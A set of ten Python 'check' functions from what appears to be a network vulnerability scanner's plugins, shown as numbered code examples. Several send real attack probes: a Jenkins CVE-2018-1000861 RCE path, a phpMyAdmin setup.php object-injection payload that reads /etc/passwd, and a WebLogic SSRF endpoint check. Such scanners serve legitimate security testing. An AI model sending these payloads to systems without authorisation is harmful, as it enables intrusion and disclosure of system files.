示例#1
0
def check(ip, ports, apps):
    result = []
    probe = get_list(ip, ports)
    for i in probe:
        out = get_title(i)
        if out:
            result.append(out)
    if result:
        return result
示例#2
0
def check(ip, ports, apps):
    try:
        probe = get_list(ip, ports)
        for url in probe:
            result = put(url)
    except Exception as e:
        pass
    if result:
        return result
示例#3
0
def check(url, ip, ports, apps):
    result = []
    probe = get_list(url, ports)
    for i in probe:
        if re.search(r':\d+', i):
            out = get_title(i)
            if out:
                result.append(out)
    if result:
        return result
示例#4
0
def check(ip, ports, apps):
    try:
        payload = "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"
        probe = get_list(ip, ports)
        for url in probe:
            r = requests.get(url + payload, timeout=5, headers=HEADERS)
            if 'java.lang.NullPointerException' in r.text:
                return "CVE-2018-1000861 Jenkins_unauth2rce"
    except Exception as e:
        print(e)
示例#5
0
def check(ip, ports, apps):
    try:
        probe = get_list(ip, ports)
        for url in probe:
            r = requests.get(url, timeout=3, headers=HEADERS)
            if 'Jenkins' in r.text:
                result = jenkins(url)
    except Exception as e:
        pass
    if result:
        return result
示例#6
0
def check(ip, ports, apps):
    try:
        payload = "/scripts/setup.php"
        data = 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}'
        probe = get_list(ip, ports)
        for url in probe:
            r = requests.post(url + payload, data=data, timeout=5, headers=get_ua(), verify=False)
            if r.status_code == '200' and 'root' in r.text:
                return url + " Phpmyadmin Setup RCE"
    except Exception as e:
        pass
示例#7
0
def check(ip, ports, apps):
    try:
        probe = get_list(ip, ports)
        for url in probe:
            payload = '/uddiexplorer/SearchPublicRegistries.jsp'
            r = requests.get(url + payload, timeout=3, headers=get_ua())
            if 'UDDI Explorer' in r.text:
                result = weblogic_ssrf(url)
    except Exception as e:
        pass
    if result:
        return result
示例#8
0
def check(url, ip, ports, apps):
    result = []
    try:
        probe = get_list(url, ports)
        for i in probe:
            if re.search(r':\d+', i):
                out = get_info(i)
                if out:
                    result.append(out)
        if result:
            return result
    except Exception:
        pass
示例#9
0
def check(url, ip, ports, apps):
    output = []
    probe = get_list(url, ports)
    for i in probe:
        output.extend(struts(i).run())
    return output
示例#10
0
def check(ip, ports, apps):
    result = []
    probe = get_list(ip, ports)
    for i in probe:
        result.append(run(i))
    return result